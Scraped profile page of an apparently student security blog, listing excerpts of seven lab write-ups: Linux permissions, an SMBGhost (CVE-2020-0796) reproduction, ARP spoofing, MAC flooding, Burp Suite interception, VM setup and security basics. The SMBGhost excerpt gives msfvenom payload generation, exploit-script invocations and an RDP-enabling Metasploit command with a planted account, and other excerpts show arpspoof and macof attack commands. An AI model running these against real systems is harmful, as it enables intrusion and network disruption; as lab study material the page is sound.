自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(7)
  • 收藏
  • 关注

原创 Linux权限设置(小实验)

2.要求在/下建立一个名为centos的目录要求,自己同组的用户在该目录创建的文件继承该目录的属组。5.在tmp目录中,建立一个名为root的目录,要求建立的所有文件,natasha都有读写执行的权限。1.在/tmp目录下建立一个名为simplexue的目录,并设定该目录权限为所有人可读写可进入。3.要求修改该/centos目录权限,目录中的文件只有建立的人才能删除。3.建立一个名为simpleware的组,并指定为自己名字用户的附加组。5.将用户test用户锁定,为自己名字的用户设定密码为centos。

2024-03-12 21:39:54 320 1

原创 永恒之黑漏洞复现

输入命令: msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8888 -b '\x00' -i 1 -f python生成反向木马。可以输入命令:命令:run post/windows/manage/enable_rdp USERNAME=abc PASSWORD=123456。此时重新打开一个终端 输入: python3 exploit.py -ip 靶机ip。在kali中输入: python3 CVE-2020-0796.py 靶机ip。

2024-01-15 20:49:28 362 1

原创 ARP欺骗攻击实验

在kali系统中利用 arpspoof -t 192.168.43.73 192.168.43.1 -I eth0开始攻击。在kali系统上 用nmap 或者netdiscover 或fping 命令查询ip地址的存活主机。此时 ping baidu 会发现ping不通了。在kali中按 Ctrl-C 结束命令。首先要查询目标主机的ip地址。然后在目标主机上ping百度。注:本文章仅供本人学习使用。目前是可以ping通的。

2024-01-15 07:00:00 381 1

原创 简述利用虚拟机kali系统与eNSP进行泛洪攻击实验

设置云的参数,点击增加-在绑定信息中选择与kali系统ip相符合的选项-在端口映射中 入端口编号与出端口编号 其中一个选择2一个选择1 标记双向通道-确定。用 dis mac-address 命令查看信息是否与主机1 、2的MAC地址信息相符。先查看kali 系统的ip 然后在eNSP中分别设置主机1和主机2的ip地址。利用ping 命令 检查主机1和主机2 一直保持连通。在kali中用macof -i eth0命令开始攻击。注:本文章仅供本人参考学习。Ctrl+C 退出程序。

2024-01-14 21:19:04 700

原创 用burp suite professional 在浏览器中简单抓包

点击右上角 CA Certificate 会自动下载一个证书文件。开启手动代理 将地址127.0.0.1与端口号8080填入。首先打开burp 查看代理中的选项中 代理监听器的接口。然后打开浏览器中的设置-系统-打开您计算机的代理设置。点击管理证书 - 受信任的根证书颁发机构。在浏览器中输入www.weibo.com。然后打开burp代理中的截断。点击拦截禁用-开启拦截数据包。注:此文章仅供本人学习使用。在浏览器中输入地址:端口号。导入刚刚下载的证书文件。此时burp中抓包完成。

2024-01-10 21:15:52 720 1

原创 在虚拟机上安装win7与win10系统

安装完成后可以利用cmd命令查询虚拟机的主机号(ipconfig),然后再本机上用cmd命令输入ping 虚拟机主机号,查看是否联通。完成后利用win+R输入services.msc gpedit.msc设置禁用系统更新权限。需要安装Vmware tools win7可能需要补丁 win10不用。Win10的大部分内容与win7相似,最重要的是win10的映像文件。编辑虚拟机的名称 选择安装位置(不建议在c盘安装)由于安装好的虚拟机屏幕太小并且不能与本机交互等原因。

2024-01-09 22:11:08 543

原创 第一节课(一些网络安全基本的相关知识)

安全三要素:机密性、完整性、可用性 CIA。http请求方法:最重要的两个 get和post 他俩的区别是 get提交信息后会在URL后面显示相关信息 ,而post要通过捕捉才能显示出来。host头、user-agent头、referer头。2.原生架构 虚拟机直接作为操作系统装在硬件上 可以同时运行多个操作系统。虚拟机运行架构分为1.寄居架构 虚拟机作为应用软件装在操作系统上。表示已收到请求,但未完成操作,用于通知客户端。告知客户端执行额外的操作,通常用于跳转。请求中的操作已成功完成。

2024-01-09 21:40:59 342

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除